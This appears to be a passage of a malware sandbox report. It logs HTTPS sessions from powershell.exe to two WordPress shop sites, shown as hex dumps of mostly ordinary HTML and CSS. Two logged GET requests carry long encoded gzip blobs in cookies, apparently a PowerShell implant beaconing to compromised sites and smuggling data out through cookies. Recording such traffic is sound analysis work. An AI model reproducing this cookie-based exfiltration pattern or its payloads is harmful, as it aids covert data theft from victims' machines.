                                                    2024-12-18 10:18:13 UTC16384INData Raw: 66 31 31 65 31 65 7d 2e 74 69 65 2d 73 6c 69 64 65 72 2d 6e 61 76 7b 77 69 64 74 68 3a 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 31 3b 74 6f 70 3a 35 30 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 33 70 78 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 39 32 70 78 29 7b 2e 74 69 65 2d 73 6c 69 64 65 72 2d 6e 61 76 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 37 70 78 29 7b 2e 67 72 69 64 2d 73 6c 69 64 65 72 2d 77 72 61 70 70 65 72 20 2e 74 69 65 2d 73 6c 69 64 65 72 2d 6e 61 76 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 7d 2e 73 6c 69 64 65 72 2d 61 72 72 6f 77 2d 6e 61 76 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 6c 65 66
                                                    Data Ascii: f11e1e}.tie-slider-nav{width:100%;position:absolute;z-index:1;top:50%;margin-top:-23px}@media (min-width:992px){.tie-slider-nav{opacity:0}}@media (max-width:767px){.grid-slider-wrapper .tie-slider-nav{display:none}}.slider-arrow-nav{float:right;margin-lef
                                                    2024-12-18 10:18:13 UTC52INData Raw: 65 61 5f 32 20 2e 63 6f 6d 70 6f 6e 65 6e 74 73 7b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 73 2d 66 6c 0d 0a
                                                    Data Ascii: ea_2 .components{-webkit-flex-direction:row;-ms-fl
                                                    2024-12-18 10:18:13 UTC16384INData Raw: 34 30 30 30 0d 0a 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 23 6d 6f 62 69 6c 65 2d 73 65 61 72 63 68 20 2e 73 65 61 72 63 68 2d 66 6f 72 6d 3a 61 66 74 65 72 7b 6c 65 66 74 3a 31 30 70 78 3b 72 69 67 68 74 3a 61 75 74 6f 7d 23 6d 6f 62 69 6c 65 2d 73 65 61 72 63 68 20 2e 73 65 61 72 63 68 2d 66 69 65 6c 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 7d 23 6d 6f 62 69 6c 65 2d 73 65 61 72 63 68 20 2e 73 65 61 72 63 68 2d 73 75 62 6d 69 74 7b 72 69 67 68 74 3a 61 75 74 6f 3b 6c 65 66 74 3a 35 70 78 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 31 70 78 29 7b 2e 68 65 61 64 65 72 2d 6c 61 79 6f 75 74 2d 31 20
                                                    Data Ascii: 4000ex-direction:row;flex-direction:row}#mobile-search .search-form:after{left:10px;right:auto}#mobile-search .search-field{padding-left:45px;padding-right:20px}#mobile-search .search-submit{right:auto;left:5px}@media (max-width:991px){.header-layout-1
                                                    2024-12-18 10:18:13 UTC8INData Raw: 69 74 69 6f 6e 3a 0d 0a
                                                    Data Ascii: ition:
                                                    2024-12-18 10:18:13 UTC16384INData Raw: 34 30 30 30 0d 0a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 65 37 65 37 65 37 7d 23 72 61 6e 6b 2d 6d 61 74 68 2d 72 69 63 68 2d 73 6e 69 70 70 65 74 2d 77 72 61 70 70 65 72 20 2e 72 61 6e 6b 2d 6d 61 74 68 2d 74 6f 74 61 6c 2d 77 72 61 70 70 65 72 20 2e 72 61 6e 6b 2d 6d 61 74 68 2d 72 65 76 69 65 77 2d 73 74 61 72 20 2e 72 61 6e 6b 2d 6d 61 74 68 2d 72 65 76 69 65 77 2d 72 65 73 75 6c 74 2d 77 72 61 70 70 65 72 20 2e 72 61 6e 6b 2d 6d 61 74 68 2d 72 65 76 69 65 77 2d 72 65 73 75 6c 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 63 6f 6c 6f 72 3a 23 66 66 62 65 30 31 7d 23 72 61 6e 6b 2d 6d 61
                                                    Data Ascii: 4000relative;color:#e7e7e7}#rank-math-rich-snippet-wrapper .rank-math-total-wrapper .rank-math-review-star .rank-math-review-result-wrapper .rank-math-review-result{position:absolute;top:0;left:0;overflow:hidden;white-space:nowrap;color:#ffbe01}#rank-ma
                                                    2024-12-18 10:18:13 UTC8INData Raw: 6e 74 2d 6d 65 6e 0d 0a
                                                    Data Ascii: nt-men
                                                    2024-12-18 10:18:13 UTC16384INData Raw: 34 30 30 30 0d 0a 75 2d 69 74 65 6d 20 63 75 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 6f 6d 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 39 20 74 69 65 2d 63 75 72 72 65 6e 74 2d 6d 65 6e 75 22 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e d7 93 d7 a3 20 d7 94 d7 91 d7 99 d7 aa 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 35 30 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 30 22 3e 3c 61 20 68 72 65 66 3d 22 3f 70 61 67 65 5f 69 64 3d 34 37 22 3e d7 90
                                                    Data Ascii: 4000u-item current_page_item menu-item-home menu-item-9 tie-current-menu"><a href="/" aria-current="page"> </a></li> <li id="menu-item-50" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-50"><a href="?page_id=47">
                                                    2024-12-18 10:18:14 UTC16384INData Raw: 73 73 6c 3d 31 22 0d 0a 34 30 30 30 0d 0a 20 64 61 74 61 2d 6c 61 7a 79 2d 73 72 63 3d 22 2f 2f 69 30 2e 77 70 2e 63 6f 6d 2f 70 65 6e 73 75 6e 69 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 30 31 2f 62 65 6e 2d 6f 2d 62 72 6f 2d 5a 62 57 53 74 5f 48 7a 30 2d 49 2d 75 6e 73 70 6c 61 73 68 2d 31 2e 6a 70 67 3f 72 65 73 69 7a 65 3d 33 39 30 25 32 43 32 32 30 26 61 6d 70 3b 73 73 6c 3d 31 22 2f 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 33 39 30 22 20 68 65 69 67 68 74 3d 22 32 32 30 22 20 73 72 63 3d 22 2f 2f 69 30 2e 77 70 2e 63 6f 6d 2f 70 65 6e 73 75 6e 69 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 30 31 2f 62 65 6e 2d 6f 2d 62 72 6f 2d 5a 62
                                                    Data Ascii: ssl=1"4000 data-lazy-src="//i0.wp.com/pensuni.com/wp-content/uploads/2021/01/ben-o-bro-ZbWSt_Hz0-I-unsplash-1.jpg?resize=390%2C220&amp;ssl=1"/><noscript><img width="390" height="220" src="//i0.wp.com/pensuni.com/wp-content/uploads/2021/01/ben-o-bro-Zb
                                                    2024-12-18 10:18:14 UTC16INData Raw: 6c 2c 25 33 43 73 76 67 25 32 30 78 6d 6c 0d 0a
                                                    Data Ascii: l,%3Csvg%20xml


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.11.2049720129.232.136.1704438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:18:29 UTC2277OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRy26DMBD8lfIDOVW9E4c2HKKgkDRSLhUyC2zjl7yGgMTHdx3S9FD54JmdHe/DVV+jrds5kdZ0lgID8kR8hUZbMye1Uku8vuk5gdEp68HPSWNNqP2waHmtYE6wbUZxykvwA8oHz3asmgBKuO1GFOUg/zhIvPPvDr/o16SoiuV3oK2fXoTVzgMRxlb2TcMpQqG8Hu2hjxEDqXOr/EOI1RnNs7KzN/DUgVJzUrA [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: wickandjuice.co.za
                                                    Connection: Close
                                                    2024-12-18 10:18:31 UTC422INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:18:30 GMT
                                                    Server: Apache
                                                    Link: <https://wickandjuice.co.za/wp-json/>; rel="https://api.w.org/", <https://wickandjuice.co.za/wp-json/wp/v2/pages/2139>; rel="alternate"; type="application/json", <https://wickandjuice.co.za/>; rel=shortlink
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:18:31 UTC7770INData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 5a 41 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74
                                                    Data Ascii: 2000<!DOCTYPE html><html lang="en-ZA" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="htt
                                                    2024-12-18 10:18:31 UTC428INData Raw: 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74
                                                    Data Ascii: :"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everyt
                                                    2024-12-18 10:18:31 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:18:32 UTC8192INData Raw: 32 30 30 30 0d 0a 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26
                                                    Data Ascii: 2000orts.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&
                                                    2024-12-18 10:18:32 UTC6INData Raw: 78 20 72 67 62 61
                                                    Data Ascii: x rgba
                                                    2024-12-18 10:18:32 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:18:32 UTC8192INData Raw: 32 30 30 30 0d 0a 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32
                                                    Data Ascii: 2000(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2
                                                    2024-12-18 10:18:32 UTC6INData Raw: 3d 27 65 6c 65 63
                                                    Data Ascii: ='elec
                                                    2024-12-18 10:18:32 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:18:32 UTC8192INData Raw: 32 30 30 30 0d 0a 74 72 6f 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 69 63 6b 61 6e 64 6a 75 69 63 65 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6c 65 63 74 72 6f 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 30 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 79 69 74 68 5f 79 77 72 61 71 5f 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 69 63 6b 61 6e 64 6a 75 69 63 65 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 79 69 74 68 2d 77 6f 6f 63 6f 6d 6d 65 72 63
                                                    Data Ascii: 2000tro-style-css' href='https://wickandjuice.co.za/wp-content/themes/electro/style.min.css?ver=3.0.3' type='text/css' media='all' /><link rel='stylesheet' id='yith_ywraq_frontend-css' href='https://wickandjuice.co.za/wp-content/plugins/yith-woocommerc


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.11.2049721141.193.213.104431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:18:35 UTC2277OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRy26DMBD8lfIDOVW9E4c2HKKgkDRSLhUyC2zjl7yGgMTHdx3S9FD54JmdHe/DVV+jrds5kdZ0lgID8kR8hUZbMye1Uku8vuk5gdEp68HPSWNNqP2waHmtYE6wbUZxykvwA8oHz3asmgBKuO1GFOUg/zhIvPPvDr/o16SoiuV3oK2fXoTVzgMRxlb2TcMpQqG8Hu2hjxEDqXOr/EOI1RnNs7KzN/DUgVJzUrA [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: skagitorganics.net
                                                    Connection: Close
                                                    2024-12-18 10:18:35 UTC991INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:18:35 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding,Cookie
                                                    Link: <https://skagitorganics.net/wp-json/>; rel="https://api.w.org/"
                                                    Link: <https://skagitorganics.net/wp-json/wp/v2/pages/1194>; rel="alternate"; title="JSON"; type="application/json"
                                                    Link: <https://wp.me/PcRIbW-jg>; rel=shortlink
                                                    X-Powered-By: WP Engine
                                                    X-Cacheable: SHORT
                                                    Cache-Control: max-age=600, must-revalidate
                                                    X-Cache: HIT: 1
                                                    X-Cache-Group: normal
                                                    CF-Cache-Status: DYNAMIC
                                                    Set-Cookie: __cf_bm=Q9L5BHXZiZQX1aeRuzzG0aTjSpjzTnsTrxznm5_cXmg-1734517115-1.0.1.1-JvS.iFcwsYuWY_RPS..ragmq.Y1M6DcIiWpjlzqBbZriHL8CfbUXDcE8LPFRCITlDvIgelFnHFkUPW.kHW.Siw; path=/; expires=Wed, 18-Dec-24 10:48:35 GMT; domain=.skagitorganics.net; HttpOnly; Secure; SameSite=None
                                                    Server: cloudflare
                                                    CF-RAY: 8f3e68e4ae244583-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-12-18 10:18:35 UTC378INData Raw: 37 62 64 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 6b 61 67 69 74 6f 72 67 61 6e 69 63 73 2e 6e 65 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 69 6e 64 65 78 2c
                                                    Data Ascii: 7bd2<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="pingback" href="https://skagitorganics.net/xmlrpc.php"><meta name='robots' content='index,
                                                    2024-12-18 10:18:35 UTC1369INData Raw: 20 70 6c 75 67 69 6e 20 76 31 39 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 73 68 69 6e 67 74 6f 6e 26 23 30 33 39 3b 73 20 42 65 73 74 20 52 53 4f 20 2d 20 43 61 6e 6e 61 62 69 73 20 43 6f 6d 6d 75 6e 69 74 79 20 43 6f 6e 6e 65 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 61 73 68 69 6e 67 74 6f 6e 26 23 30 33 39 3b 73 20 42 65 73 74 20 52 53 4f 20 61 6e 64 20 6c 65 61 64 69 6e 67 20 70 72 6f 76 69 64 65 72 20 6f 66 20 70 65 73 74 69 63 69 64 65 2d 66 72 65 65 20 44 4f 48 2d 63 6f 6d 70 6c 69 61 6e 74 20 6d 65 64 69
                                                    Data Ascii: plugin v19.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Washington&#039;s Best RSO - Cannabis Community Connection</title><meta name="description" content="Washington&#039;s Best RSO and leading provider of pesticide-free DOH-compliant medi
                                                    2024-12-18 10:18:35 UTC1369INData Raw: 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 31 22 20 63 6f 6e 74 65 6e 74 3d 22 45 73 74 2e 20 72 65 61 64 69 6e 67 20 74 69 6d 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 31 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 6d 69 6e 75 74 65 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62
                                                    Data Ascii: "summary_large_image" /><meta name="twitter:label1" content="Est. reading time" /><meta name="twitter:data1" content="3 minutes" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Web
                                                    2024-12-18 10:18:35 UTC1369INData Raw: 34 2d 30 34 2d 31 38 54 32 30 3a 32 36 3a 34 30 2b 30 30 3a 30 30 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 27 73 20 42 65 73 74 20 52 53 4f 20 61 6e 64 20 6c 65 61 64 69 6e 67 20 70 72 6f 76 69 64 65 72 20 6f 66 20 70 65 73 74 69 63 69 64 65 2d 66 72 65 65 20 44 4f 48 2d 63 6f 6d 70 6c 69 61 6e 74 20 6d 65 64 69 63 61 6c 2d 67 72 61 64 65 20 63 61 6e 6e 61 62 69 73 20 63 6f 6e 63 65 6e 74 72 61 74 65 73 2c 20 66 6c 6f 77 65 72 2c 20 65 64 69 62 6c 65 73 2c 20 61 6e 64 20 74 6f 70 69 63 61 6c 73 2e 22 2c 22 62 72 65 61 64 63 72 75 6d 62 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 73 6b 61 67 69 74 6f 72 67 61 6e 69 63 73 2e 6e 65 74 2f 23 62 72 65 61 64 63 72 75 6d 62 22 7d 2c 22 69 6e 4c 61 6e 67 75 61 67
                                                    Data Ascii: 4-04-18T20:26:40+00:00","description":"Washington's Best RSO and leading provider of pesticide-free DOH-compliant medical-grade cannabis concentrates, flower, edibles, and topicals.","breadcrumb":{"@id":"https://skagitorganics.net/#breadcrumb"},"inLanguag
